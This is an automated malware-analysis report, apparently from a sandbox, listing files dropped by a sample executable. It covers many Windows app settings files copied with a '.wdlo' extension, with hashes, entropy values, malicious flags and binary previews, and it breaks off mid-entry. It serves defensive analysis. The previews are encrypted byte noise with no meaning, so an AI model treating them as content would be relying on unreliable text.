                  SHA1:E83F228EB3A441963086FB2DAD4ED675B421C51F
                  SHA-256:379E8AF5019D6E75E420E9F9CACEDBC4E23EF6C7EAF2A9444267FAE07EC47D4A
                  SHA-512:094307A119AC80D15357F4D87A027AF246876C5D5E8ED6365A55D4B1774059B79BAAC997061217F63815EDA9C766B77D6EB9CF54C88A12214E2DC570FEBB159F
                  Malicious:false
                  Preview:regf.R.Tw'..dZN4E.3Q..&In.=....H.U..F.Y!Z.5o........]...i..!..(6..uo..[..X7,.qe*..$.Cb...]..8X.l...t... 9....=...._E.K...0w.At...#@c;>z.I...GUKP.i..i..$.uk<.-..G....U.....D.^u1....F.">.'.E.I..]?h...j<.{g...V-H<..uh..w.........l.wf.?...}1.BO.6.!D.....esh,...l@.....O..&......,.[.S..s.u'..=.....L...CU...PW...O.....R.%%Kx/..{~..8....0Mc..u.N...d.r..[.Q..L..l7"...=.P.)..B.U........'\>.h..-......3.X....._.Wg...w...}....44.t...l...a. .-~=0.K...8.........w./Hr1.....A.A.^..TIi...M~..F[.e........an...rv.....R)|..C2..5...Z..Z...Y...A&!...0.U.............j......o........... !....9...mJ. .D/Ak.M..J....y2%.....*gw.....Z.(...g.A.K.t..d[..m3..o...B.'.....h.7U..H.o!...N\!9..#..C...&.#..yZf....E?q...Y..#N.2I./{%.g.,h.....x<.........Lr.t.d....!V>|....|..:....###.|.N...e(.,......k..l.....4.<.\.U......\.;.L..~...c.e....,<..`7x.3.RM....`......Q.?c.\T.MQ...5..[..X.#a.....}...E.".^>3..}...AU..`.k.....a.D...C4.......k.H.eY0..:........).?y{yj....e..%TKz..0

                  C:\Users\user\Local Settings\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975885138395085
                  Encrypted:false
                  SSDEEP:192:fXrQnj81De2LZ8fg6GOzrd6irvm083txaHTnrcCYOqhkJ4O0:fXsWPt8VGQrdbvmxtCTnrcCYRg4O0
                  MD5:1A948C6C0320BD305F32F813C0596098
                  SHA1:5C2EE7B664748CB94B8E508C8F2589F063B1947D
                  SHA-256:C60F9F0BD00D0280443B24780247D210ED3DD6D0F40054226FA9FF7ACB6584EB
                  SHA-512:69A55531531F1FE2EF2CEC16ED2E11F80ECD80014F3FAF2ADEEE45CE076B5DDC8D4C7BDCBB2E8903514DB67F31BE4DC63727AD14497F57F9D50F15A646CAE44F
                  Malicious:false
                  Preview:regf.ePP...N~.^.....X.8..}|'.'.9...On......A.....g...;+.LT;{.#7:....3;2....i......v.w..j.{h...H.WT%...R...`6.")...4. mz..5..L..z..[U..X'.$..(.. .M...p..t.hz..M..(..9.g..d...(.............plu+@..AS#k.{...i....w..&.K..[.......ldZB.}.a)....*.jUa._..M..9m........"..<......+.@l.>A.$.... h...$..O_ 1p......._{...Q...xZ.~.o....8c..[...w{. p...ndA./_..oA.Ac0.A.\FN....$|..Vv.".-.B_#x....>.Y.T.\&..;..2.J6..>...lG...;.weM.]M7._......^.K.#M:...n...#..}{........'..Z+."....K...5........~A2..5...v-k8.......}...F.._..ja.q.9vD...E...;..YWU.'.X?....k}B(#.g.OH.Op;..!1O....&.L.k. .__...{.o.y.Y9$4.....a...(....u.J.%p...ID...]..p&^..r.=..2...).i}..Y.7"...T6~u$.p8..MS~.....*.h9*5....e.v:.T..........f..r.....Ac.f.Y....c...........r9.........".>/.'G*!{.%F.P..l.%.f.o.Z.......ya....+"....b$...<...8.Kj&3.d|.3........3...a..N....K..W'......y?..^.v.l.f...=2;\....7.4.p...c....F....fN.Oy].@.ug..U..H.Wk.?^...W..|.".L...& 2.F...s.O....rA....c..M...DIDf........'a.r.......

                  C:\Users\user\Local Settings\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9783719491786185
                  Encrypted:false
                  SSDEEP:192:NzkTdBtQp4aCHG6zrVMI1y/7VXGnBvIC3u:vpLCnXVLsZGBAQu
                  MD5:3AA06370FCC86B14CD6D6A3D961148AD
                  SHA1:996DC9F15827E4A26CA3FA8D54DB264B6FF7CE8D
                  SHA-256:707D89F4F4D7858C3374848FB532EEB77DC2089490849D051A06964C549F99F7
                  SHA-512:1376182C9C50F8EE0B327387027E655ACD68FBAC3548F81F55C88CB0D6D365BD895FA3558DA2142E947C871EC36AB5882244A5E11353B3D1CBBF4E4F8BA0BD77
                  Malicious:false
                  Preview:regf._..ph.5D4R..H.O...(...#B3.Z..&._..{...h....nLw|...C...'.X,..:.G.>Y.w.P.......k.f#.P....I\..1.c'../..D.!.e..c....]M.L...c=w.....20<.GO.+.....F.h.{.j...e.Y...V..M...q..mt.M-1(.|.....l...k..>VB6.G..Wb...VX..zP....x..J^..d.K.gDMR..6dsk...~..ZV0..dKx.R......p..W4y.a.......a...Q..H.J...%....../^B.}^V$..+.%..vr.9....(..v....g.....BKA.Y..."..H.NE..O8H....p.|.z.....3.C5.o.[...S.P.Y.}+......(=R..81.......`.l[)`:[X.*..<..t5..<..b0v..*..0..h.o.._......Dn.VK........L}..~rzn...?G|QT.....NR.|..**...j..@Jl.....f.\T.[~{.>/...2..5G.{.d..g.$9..B[9..@]~CY...Zq.X.<...O...$...H...E]..#.b.~.._....H..d..s....c.6..iB..d.....}Z7.Qby.#..1..=STr-.........B..{+..Z|....E..!.=i..@fh.+....?.r\.V......I.4z....L...%..:.Kr..X.cV.....$w>.r.a....D.=.........,..a..l..w~c......P..?..."...O}........j."A..D.p...s.3...Of..._p....P&..DB...Kz.:.C.Y.+..Nb.,.A..;U,.B_J...V.qak...-k..bD@..j....K..~.U.V.B..c.}|.Y.....?.d.....d....y.7g...".....)G.D-,.J).b.:..Ss..C.mX`=..

                  C:\Users\user\Local Settings\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977873558790145
                  Encrypted:false
                  SSDEEP:192:cQ4nsYeb1sBHuGHHo9+krH0nRWf1jQoHixigyMQ3gb6:iTebWtng2RqQoSE3gG
                  MD5:616ADA6F28E7C7AF24651BDC18E1DFE9
                  SHA1:B3EFB4158C921CBE4C04A73B410F02AC53A59F93
                  SHA-256:A68EC50E02C787E7152F6794A412DC779A467FAE54F1E32AEAA996E069515B81
                  SHA-512:C36259D8AB507BA87E9870B66FA4E3767569B13FC36F34AD2A32F60953C963BB4C40A89866B19833578CA7932B426699BDF0CA3AACA6EF77EB80F8A7DE98A79D
                  Malicious:false
                  Preview:regf...8N.E...#..y.J....zb.<O.X9.b.f*....c.(........W.q+....}.q.)...M.d<..h[.2dc....Y..B.$.W0.7T...ZQz...A..S......fx].]..BE.L..=oC....eUi..4.L...d.....Jd.2.x.*..T.2tE/..,3s.>?:F3Y.....w...D`...7.K.|..%eN..csB..........f9.i'.j!....:+\..>oC.I.Z.........~K........O._.:$....<...g...a......5x.*.....aq.;..:.:M..r.^..\oP>......0.....*.k...-~.7..m.t........R.T.8O...v........T.).gL.:D..8.Cg.......6#$m..A-...$sQ..4..b...f.)..)G.6.`........l...8?.7y...............].._>..3S.;....;...Tbrm...+....#j.R...R..!(.}.2q..Q..)|. .c,.p.gA.=....h..9{y"S.........y..d.......gh..2M....6.-A....|.....n.&.Y.U.}.......m:...{.1..rer.;,.?...v.).O..d.W..\...~...l..A3......[|$p.nT....f...N....zmS.......[.J(:c.y.....!%......_...#....._...}./<..u...h.|.....5.+..z..1.yf.....d..k lTG..d1A..%.b9..:...........v..vTF.r..V{..H.w^...9.....4v..'#&ql.4q..y+..,.Q.=j...o1p.*Z:.VV.S....jJ.....%...dT../0....7'a..y` ....JR/M.T.H..A.?..c.eG.\..:....8...HjZ.1<V.S_.l?....O..C(K._

                  C:\Users\user\Local Settings\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979865876586799
                  Encrypted:false
                  SSDEEP:192:iJSvlCUksLr/8AMkTrgqgf+D5O6KKQAe4Rku12IZmDWvzZ6Q4Xef:i0vlnkqrOkTNG+PRku1hcDWF4m
                  MD5:84915836BCB1E86CAEA3B18C14C0F256
                  SHA1:1DF7FCFE7D5769B2CDEC4216694E440BD60AC0B7
                  SHA-256:1EC3E1CEB0A086CDF6BBC4003C2156E229EFEB010C4583B1E1CF2517A234E30B
                  SHA-512:14A0EF2329D8B296639A848714012E0E2FA7664EC73EEEA4EF8ABBDAB95C4502A1E7D80E0E1E26669BD41325B247A838083B7703FE2200994E113B629019E7EC
                  Malicious:false
                  Preview:regf...E..F..g...=.J..1s......37..O...4....s.xT.;:......0-...W.4..L.Z...}..q.cR<M......]G.0.y.U8{.5k....q....E}.{..n..)n7$....-...p4Z4.{6C<.=..+.w.H........se`{.....c.n.....k.....j.pe.K..1.es...-:.2.W..2...v$..........~...kno..@.2..w+..=...t.i.{.}..A..Cd....f.....l.W....b..8..w.....F.j.....&...UYX.QJ........C...m.....b.4.....y.$.pI..O0.M.V9..:.w/...w...DJ.J?e.s_...Y `.f..o.R...~.(.~Z.H.;..,..x.Dc.....s...A.......U..u..j...R.e.,YP.........$..*g......p...|.%.Z.'^+.<6...=.).!.]... .-..P....a...~..y<..4.n.........=..f.3T.*..h........,P..*.s;d.l..E.K.(...zIzE.^...w.n.P2......]I.]B..23.R.KA.s..M....O. \.R.....E.X......|I.....j.u.5....M..5...rb<U5.Z?3......t .s...........sA.p.......\^+e..........>.\.7.gB.0@.md......o......9Gw.....X.... .0....m..../cr.{MZ.w{G....'.D.Q.z.../..T...x..v.'..{.....-A....:.?,..?.q....r........J.'>.......b....{>'...q...!F*(...r..[*&p+..........].....C...e.*.'.o.w8..z.U.#.\../.eN.8c..i7.6....."......U.."

                  C:\Users\user\Local Settings\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979418037984097
                  Encrypted:false
                  SSDEEP:192:+zvo9Cs3c1qTD8X6w69sEFtSiGwMYbd8Ow0jMY0CLA:uKT3Rw0sGt2Qr9NrLA
                  MD5:91B67D98BB817FB4ECE7E5D6E52FDA75
                  SHA1:E633D36AF81D6117EA8578C1B7ACFA9F56774DF6
                  SHA-256:7CD831C5BC60E2320B880FA57223F40B50667B136A8168029DECD38559E42B6B
                  SHA-512:1F6F1C9A04AF53E3CC6A0965FB46C00432A43C28682AD48A7C7EA49812918B2EFFB831E914CCAFD1D07040DF4E18C7FA66420BA456F6EC31EA0670F95E9592C9
                  Malicious:false
                  Preview:regf.H.....-jj..>....=.........`..ui.....O.\....9..^.F..L.[...............Xb'~/>)..a....0.#.K..............[...Jw..:.H...nuK..6R..&v..`.68*..p....V....a,..{.q.....q....8q...........G.b>.`R.#...4.Yi.7n.hs.{.0..P.X.|....~....3..C<..M..Vl..b..hP$!,.CAZ...am.,........J6.nf.i.)..Z.I....?,..$.o......J......."#.........`........,...k7[.(.-.n...sU(.......;X..)..dB...D.H..G.ux..Ts.Ao..`.$h.3cR713Nl^...>v.\.1(v.9...|...e..w,y...b...T...P..(.......3w.j%...x.T.Q.....j2.A_*.t.m._.G+.B..4j.J.mL..k.m....o.4.@....R^..}.......i..7.!(....O.......d..*.R?m.$.$.A...a....t.$>v..x..z.F..@>,.d...j.u.F.#.....N..r....\.;U...]f.cz...[}..e.E..A....}&..K.....".4oY.1o.<.f.^.=..j.#<'..d~?`..E<0..F.?k..d..{..g9<...._,.Lc.X..[..x..+...Z.)....*x?-.........F...M..mW..]CIm..pd_.......u......t.Z.b. 4>....A$w.#F~....~.(FO.(..#V?.k#.?^.~>9.>..5...$..G..V.-..X.&9.1.9\/.o...n..].o=...Q....sYL.e!.Xy.R..{...\..9........)P...</.K7..+..K.Hq.z.}{\>.a{..x.........S....>.*X....g..|.M

                  C:\Users\user\Local Settings\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.98143963661955
                  Encrypted:false
                  SSDEEP:192:r/IkghgUzz+925V/T04C5vaY3cf5eqhQ3hqsoZrShhq:cxe25VY4cv5c8hqsdE
                  MD5:4332F0DFE93289369FC51F575DB90F3C
                  SHA1:D3BD19612248F9BD7F594D781561186AB6FACA78
                  SHA-256:520098A9E99AE5AB8B7D29CC83FF2FD00C049D5394F093C5564000BD18F7C6B6
                  SHA-512:FD04E93D4C61C4ED0D82C507A1D13125485A5308241EAE806A1CBD8A334BD6A770C3E8218114C4688CF8A648076420ACF69C367CCBC3570D6CE450D117A0A69C
                  Malicious:false
                  Preview:regf.8..h?}.!..t9*.Y.]J...R..p....D.^WB..\Z.T"#T.x.....C.5.......M...r.6^.._$.$..C..#..b..+..q..A.l..S =.z..).[E...q.V...A0..q.....<W@.......iX...i.Y~.c...QRO.q......Y/.J..E6}K...]>........:.....y'..R.f....W.|!.Q.z:....N..?..B...R..!b.....F.0q..%..".m.z.+~v.mGc..&b.8=..l.G./.......QP.n....."..w.97.n...{.n........H..ms....2.^.L.e.~e.l.{..s.e...*(]...=.X.`60UF1\.j..%BM..s.c.....bP......{'.Fw....{..}.(y..R..Rq.....F...........3.=....6.Y..}..S....U.{.....7...Wm{M.Y'].]F.....l...Q.G.:........W5>r..cR....9.mX...yc...5.FR"...1w.+.e.H..F......D.....8U>.p...?..8.5i ..w..g.k^..B.p..W...f..7...[=...C....pp.....\.?.4.=#.q.....Vs.{........T.p.LK.].'.0.b.*Q.i7.../)7s......S.<....3.t.(...4.?\.N..s.......!J...p.u*"....!..\$q.....R|.._3.{.......0.eD...F...._7..v.Z.w.x.^.%5<!<....JZ..(..K.U.C.1.....T.1.J.$.f...k....b...S..?G.Q...{.Q@s.....{'...iX..P)...V...D..bl.....p....LN..t.R.m.....T....H&..hk.C,u.......R.L..Xd:..q.....&..K`....A.....;... .Hq..~K.f.E...

                  C:\Users\user\Local Settings\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.974855039787571
                  Encrypted:false
                  SSDEEP:192:FAxURZrOxTqdBK1UCweKnuPT2n/rrRiMyCfh:F2eU1qFTQCrEwh
                  MD5:D1C8030F15431C5405166EDB23812D35
                  SHA1:681964C3059A53827C5521DC422011B384D049E6
                  SHA-256:12C5924CA4F6400AF9D1C1A184FC30138BD08082BF2114B106F82F31EB186473
                  SHA-512:5179F4A5BE0F5178BC071B0AAACD882519C09801312062C5C94F9AF38313AA0EEB0565D44108DBD27EDC2D3C11CA2BEB49E294675EB83BCC5B6764D5B10D2EF2
                  Malicious:false
                  Preview:regf.......VT".....m.D.4..b....{.yy.E..Ol..%'...M..(..b.*V.x@6`.d;T.vo-1....[.O.../..eO.X...=..r..'Kk...l.^.<....pT0$..0$E..!H..I...!..=x.S)....'..6....@.W....Z.3..0... ...&..+.K...L.I7..$W.u.....]^.Iw...|...~.@1Ln.9RVNIw...$...t.;.!oh.6.J..V.......|.I.....`...7!...l...BT>....U|.VI.i..'6...RJ.V....'.......wA.Z.C?8Q|49.db......RQ.C....'K5..K.-tO53A.^*.v....\.e*..D......"..v6...^...$.Q,5a.)6|.g.....;....16...,n&.G.<.A.'Cl.....j.....4..E..@.d..........t......3.d.z.7.4.'..........0I....,(M%.....&..#...l.d9{S...^?....{...~...A..S.c...}k.=0.......KN_.A6I.T.'?.2._..:.y38&...f.......$.q.]......R.3.jm2T. ..32@..r7.2.KU6...L}.bp.!v....<..k.......Q.y.t...v..q.....`...K...@\+:8.h\.....$.N.H..I$....#..*..c..>P..........]w....:....s*..m..F..I.$..G.?.'..1...i..}...BF._sm.VD~.w0.&..}Y.d<....^...X...~.1[..q....4.........l.L.T.Up.n.J`...:.....=...+.a)[.A)..81!...A..'.....G..B....k..Y....T=....^....U.:>r...5y$z.T....j......u:Xn.Xan(..M...zi...O1....

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975363841872065
                  Encrypted:false
                  SSDEEP:192:AgLUqZNJy4VYAS/96ELDaye+Th0AN96VJKzxNZfRnGc9:AXa7+Haye+Th0ANIf8NZVP9
                  MD5:39261F7EFFBADD9DF4A780BE39A82ABE
                  SHA1:9588C4DB81AE8C1EA3F7B07BFD1723B9C39C7B52
                  SHA-256:388F4A99494761EC1663ECF14F56A9AB7A755574E0F262823AA915F6AE5F1605
                  SHA-512:A37A5963390869FBA5906181B431C2095B5656AAA29CE8303518176ADA89BA8B4968058EAEC8936813F5A83DCF2E43D42345297A1E8A07A10AA58046DFAC3387
                  Malicious:false
                  Preview:regf....n..C.#3..)_q.c){.k(.X'..mD...b1..:R..m...M..l.U.R!.......Q7r..E>....n.;....#..I.j/.9.>.q.eQr..6cN.x5..D.B...>.?....L.v....#...z.;./.JO...A.o.&.u.F....0...[v.;..m.....6......4.vf~O4/Ob....e...>.' .)=Z..H..1 p.k.V...;h.-..nM..6.&f..I.wz,n.p..9...y......?SnI.T.S./..>.K........^.y9eMqwf#.2.".-..}.6-./.V..y.>.c8iIk.<...qC..WC..T..I%.}U.d....'.vY..vF4........o>..........z3"....6.Lqw..Vn`.h..1'.s.s}...G..v.{S.....^..}.8......... ...1l....}.M.o^..hzWu...h.".v..F.m..c....A...a.cOJ.to..c[.;#..$06....l.et.........O.c.^.j....U..}V.od..f.H0W....eus....M....U..*.\..L...Z......xvjZ..A_.w.6..pD..C.Bk8.....Yl..t....9d..o..LX..'.j.\c.....p..~ ..b.z...w.}l.I2o>F0....64.F....`C.I.Q......u....@.N..n.j4T..B.$..;W..D)"_....D<9.W..1s......- .....%._)...>f.m.uC.fg.K.....v.......A.n.V..Q..3)..'y..F...3......T<q....Q.;` {..MOY.!b.l...&a.=@z......^'.N.......O.*'..(o..k,...w:y.x.....G....;p.f9./....A...w.M#...'..R=Z0....q.*W.;.^l....rLX..dc ..A.q.h.u[

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977664547276477
                  Encrypted:false
                  SSDEEP:192:PF0NuQOgw1+6BGyNP9LewJAwlwM1dhl/8wrqFdM0b8Fe+g:PFYlZmL9LJGwlwM9lEw23M4
                  MD5:5293FB12D176E42C0CAFF0781B1A4837
                  SHA1:5072837AFBB5FDEE8E4CEDDF0C325FBCB7C5CB0B
                  SHA-256:7896A4B83FCF7D8E179BF55E451FC4B4B26C6BA6A5FE923943EBDE210FAE8000
                  SHA-512:641EC61AD3691E9BB384B5FEB23CD946DEDD1D460B3CDEF0B3B49CF1A2C70DFF3D703BBDA0B6B552A3C0984ECB4ED8CE5B4203870ADC57DBFCABA2BBD4EC6BAC
                  Malicious:false
                  Preview:regf..B......8.{..7..nk...fd....=..}^..X.S....%...f-U.\B..h.......t..+1....z.\.-.+_......&....s5#,.^Ivx#._...!.....0YMQ%{S....2..\..Bs....@.ekQ. .VM.2#y.k.h66^.)*$)......O.Cv.......H'.G..........$1*..5..$5E....X%.1.G.R-.[uu....D.`.;.....!Jcp..mN.4....M.O[...Y....(..ZZ`.p....;%.L....l6....3.rz...`....<o.z|.Dp......u......Q.~.6{..G.s..q.b.....5.fo....w,..G..y.8.I..#..B.r.8X.......`.i..]..../4t-.......2...$....~.LxU.]....WnK(...z.>..I)%."..-w.w9...k\5...K........k..4......7]g..o...=...%...m.1y.v...Y.....Bfwz..@.8..h.k......i...x...{.y.v..7.p5.F3........B.....r......w!.(..4..:I_..f.7....f.B...kP..web.&..=2.;.+.....AZ.q..4..;<....c.!....0..."$......w3U..}.AC..A.v.l........o3..X\.j.. ..T.J..G/X.#....a...h7.,n^.mE..u.W.9.G....*.h(n!CH_e_....l.......OD..aA8.........r....W)D..&..I..u.....F.\.[.|Y..K^.FE>.p.k..[..O..I.[.....K=.].A.M.u.W....lv..E.k.^."l.d.N...../ {`...]"..B`.....xN.....$....V.4......T.5..b...u.WE....q....l\..O..i.I....F.

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):107523
                  Entropy (8bit):7.998348596999605
                  Encrypted:true
                  SSDEEP:1536:NWOm/KreovvwMaCg0kyaVMTbkcOSFVQKMxRZUnS3Um/08eNsBNJ04d+dLfLfv3aO:NWDovoDn0kyaAbk6z9aaU1/0cL07jK4p
                  MD5:5C4283D92F5A2264D7B436560A1AD112
                  SHA1:E1F96169BBDB5F923642E895305C366E28B77275
                  SHA-256:C2EBE1C2453DADC8F64723EBAFFB0D1CD25FC01CA8EA9DF0BDD122E34C32671B
                  SHA-512:D365ED4AD6165A143F3AC7BEB64AA85898E08E3BE3F91FFD346E7FDC0F08C44E1B2020F8482926CED2D14DA4FD489525FE76624A7D2CE36BB720990B299E36B8
                  Malicious:true
                  Preview:<!doc.w..+..m..Y...X[*.[..n.Gp.7..m3..x..A.C..4..^.z6h.W."+....... g.`...}.z\1..i_IX..W...-Lx...V...4.W...M.e[.%..Q.p.w....v.)...H.]....3Y...&...../...\............op.~E..j].-.th......J.^Y~a..)....{...D9.lv.[.!..&=$.L\.{.--.....;.. q.xx..7..........lB.iE.9'...uu..1-/)...5..[X3.~#..>...ZbL.;.....0rS../5.j...J.0.$.y|.!(..oqErFV.m.v...)5njm..p.<{.7*.0 ...^.S..%..Q...:.t..i'.,.B..[...!..UDf..6d.~+k..70..Z......4zD.B..B..........:....Z..[2..&..W.GhF.==...%.sT..*T...Z@.e.@j....In.<w..a...|........MAm.X..7..B".....e.b.<T.1.F.../<..W..nm.....0rwz.9....*.{r.x\e.....^.....:1.....E.^..R......7...#ha.1....G....l.`...r..$^q|"/..0.-.3..~:..`.............Q.B...D..#..+...W.R...@""......Q+.1. .....t{....tZ.....]4...)1..........'y.q....F...=..o.<..#..*.~...0.i....}.'.!e...T.<9~".. ........6e............G.S....W..rl3W..0...._o.{x...;>....l6gzH...6n..E..s..D......7......^q..j......D...9U`..T..+....(6y.xb......?..m.F~R6X`....?+.!.E....19.'$.G..).....

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977192804509469
                  Encrypted:false
                  SSDEEP:192:/eReVzIx80qP6qfgJEznQecwJqzpO0mt230Y:OF+0M62/ztcSqzI235
                  MD5:9FFFD4A3350E20EF7F73E2FD894834C2
                  SHA1:7D7E3885DA89700D440017C923A576E7B86D1785
                  SHA-256:9F35F4C6CEE424EBB2801A1AAADB253F7C83F6EB71531DA6BC4E5FEDEE8C5DF0
                  SHA-512:089DE04095C9FE7EE76CDF5C3B2B8B6A9EB2851FB14F652EF43EADC14B3C9EE703CD6C3E352DE4AD1C90A34FE7C7761D88C90D57323C5CEB7D506A8E65DDF3C2
                  Malicious:false
                  Preview:regf....u)u...'..]8*.iZ.|D{%..m.o.#:.e..^......B.5..df..`|....$.....m..^r.z..w.~....T.,r..t$...7..N./.xr.fx.%M9...3O....#`.... .bYH.<........z.l .1.4.#.}r.j...#.....9......t.m..d...,.9.RMZ..Q....(.....>..... ..5[....w;:..Y._....a.V.m`4FG..g.C,...)5L..{.............4pRW.u...].t.f.l./\.K....].r.F..r.....[.u,.U..KK.NM...1.;..).R....T....P...<..v..&&....i5.......,.6RU.....K..&&3)q.j...6C2..\.C0.B.pKGl..g ..[u..&*W..}.g.....]&...(k..#SKs.x.R|.I.9....#.8R..+.K...D.D]..t....b.]3.3..'`..+.......k......m...V......?..y.Q.uY.H.t.k'..4N...GB7..H....jD\."_..}.1*...mU{.F..v`g.,..K.:.&..k.....'...o.U..G...M...L...v....{.J..S.V....l....Z..2...-g5..........`.....n..aU..U.:C.ae....%...4..!....wz.G.[>iXit.H..#..C..=5.....&..=.....1?..u......&.....&.....$Q.M..Q.....q.....]p.q.....*b....y....#....../.S....4.oV>e..E7F..UQ4s0m...]....7.?....2....F ...F.........>..q..k.}"...b...O.6d...N..D.$....AZ...Dh.o..@.l.0.1.`... .sg.Aq..,......j..U!.M..k.j.m..0..!.<(.C..$.a...#nC

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977035478689297
                  Encrypted:false
                  SSDEEP:192:hrkto+ADFW6Ku4FgRPpqvJPuRUS9kR4+fvy/Si+:xkW+sIgRRqxPMX9kR4MvYC
                  MD5:B9E084E6BC72B449F4C47B0B13FE5601
                  SHA1:6FEFAFBA6C33A9E9E6D33BD905762BFFF841F67C
                  SHA-256:8F046E401C45EB1DDCE26B0EAD5E5C6179743C9175845386DE9108691E0B1640
                  SHA-512:EF9C49A0AF8C84489A1E68F714B6DAAF9BE8D8146C2446D5C8F35DA943A6599AA6A1EBE021A3E8FE25995FFDCDE08BC4E35A8B4C99B401A265CB2065EDEC4900
                  Malicious:false
                  Preview:regf.........N...|...a]...up..\..^.;Q+.d..}O.,.$.y..}_.f#.....0...T. H..I.#.............Sr.(\j.n.5p.4.....po.h@^.....=..<..(3..7.......x..H.......eeO.$..IH......OX.=..;g.Z."...=...<X.9_.W..d.6J...c.)X.X.L....y{.Y.~.YH.._#.6t...$..H.p.S".\U......a....EtY....7ANh....p.Kyfcr.l..l$y.....9/.......*Cf%f..:..7..M|U.h...C[..PWrA_...U{......=...b5K...>...<.r.x.W...}9..'.."*j..KE.6..pNX...).ko.Zp..v.CY.h.q....u~....Q.d.,.'U6,..'k...s!.....E.u]J...~..k..L#...^<}..{..6ZH...|.:...0j.c3&#...vf.:}8-L..=..,.......F..4.w.'.]...`...B5...a...sA..e....0..?g...l.n..)..[.S..#...O.=.O>...2..h.8...x..x......5x`.'..[:....p*....-G.......g..Y; .u.....Qs..41.O.....m...}.(.+.u:..../.a...{/a.X...KK}Sr.8k.....FV!To+.A.. 0E..S.x......pW.1Z......p....6..._..T.U5.n....lG..W....`..|o5..%.....M.._&.@F]u~}.../..v....z.....s..m........,.cD....i.......3.A....r..:+.'..r%.9f... %p..Ju...!...2O!.`./...@...Rf....p..^...%.=..$B....../.[.>...Dn[........f.3....5x...

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978462883499567
                  Encrypted:false
                  SSDEEP:192:WRRIUVyAN96JouhoHGNh2SpoSE7+um/olhF0Y1ZDGgiFGoWB3uOxMR/:WXVTN96auFDosylD0GGY5B3u+A/
                  MD5:90768D232731978D5A22F6B868E267D1
                  SHA1:5A5023FBAF83C23516A873DE4CB99926D00884E7
